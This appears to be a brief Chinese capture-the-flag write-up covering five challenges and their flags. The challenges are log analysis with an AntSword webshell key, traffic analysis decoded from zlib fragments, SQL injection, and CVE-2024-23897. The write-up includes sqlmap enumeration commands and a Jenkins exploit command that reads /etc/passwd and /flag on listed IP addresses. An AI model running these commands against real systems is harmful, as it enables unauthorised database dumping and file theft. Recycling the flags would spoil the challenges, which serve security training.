1、 日志分析2024 (100 分)简单安全杂项
0,1),1,1))=102 这些后面的数字。
flag{mayiyahei1965ae7569}
2、 事件协同与响应-考试 (200 分)中等安全杂项
蚁剑马 Key: d76R3478
flag{578530@chaitin}
3、 Misc-流量分析 (100 分)简单安全杂项\
过滤排序后为
/agent/metrics/putLines
/upload/0 789c333430020001280094
/upload/1 789c3334b00000012e009a
/upload/2 789cb334070000ab0071
/upload/3 789c333430060001290095
/upload/4 789c3334320600012d0097
/upload/5 789c333430000001260092
/upload/6 789c33350400009d0067
/upload/7 789c33350200009e0068
/upload/8 789c33b1040000a3006e
/upload/9 789c333430020001280094
/upload/10 789c33350200009e0068
/upload/11 789c33350000009c0066
/upload/12 789c3335050000a1006b
/upload/13 789c333430040001270093
/upload/14 789c3335050000a1006b
/upload/15 789c3335070000a3006d
/upload/16 789c3335050000a1006b
/upload/17 789c33350200009e0068
/upload/18 789cb3b4000000ac0072
/upload/19 789c33350400009d0067
/upload/20 789c33350400009d0067
/upload/21 789cb334070000ab0071
/upload/22 789c3335030000a2006c
/upload/23 789c333430020001280094
/upload/24 789c333430000001260092
/upload/25 789cb3b4000000ac0072
/upload/26 789c3335030000a2006c
/upload/27 789c333430000001260092
/upload/28 789c33350400009d0067
/upload/29 789c3335030000a2006c
/upload/30 789c3335010000a0006a
/upload/31 789c333430000001260092
/upload/32 789cb334070000ab0071
/upload/33 789c3335030000a2006c
/upload/34 789c3335050000a1006b
/upload/35 789c3335030000a2006c
/upload/36 789c333430020001280094
/upload/37 789c3334320500012f0099
zlib解码。得到flag
flag{d341f427e7974b33a8fdb8d386da878f}
4、 Web-SQL注入 (200 分)中等web安全
sqlmap -u http://101.200.43.249/sql2.php/?id= --current-user
sqlmap -u http://101.200.43.249/sql2.php/?id= -D pwnhubsql2 --tables
sqlmap -u http://101.200.43.249/sql2.php/?id= -D pwnhubsql2 -T flaghahaha --columns
flag{43913e17463a90ecbebd2bdfa0ab362b}
5、 CVE-2024-23897 (200 分)中等web安全
CVE-2024-23897 -url http://59.110.164.194:8080/ -c reload-job -a /etc/passwd
flag{afc832a6-b6be-7732-fb89-deefec2a7def}
usage: CVE-2024-23897.py -u http://59.110.164.194:8080 -f /flag
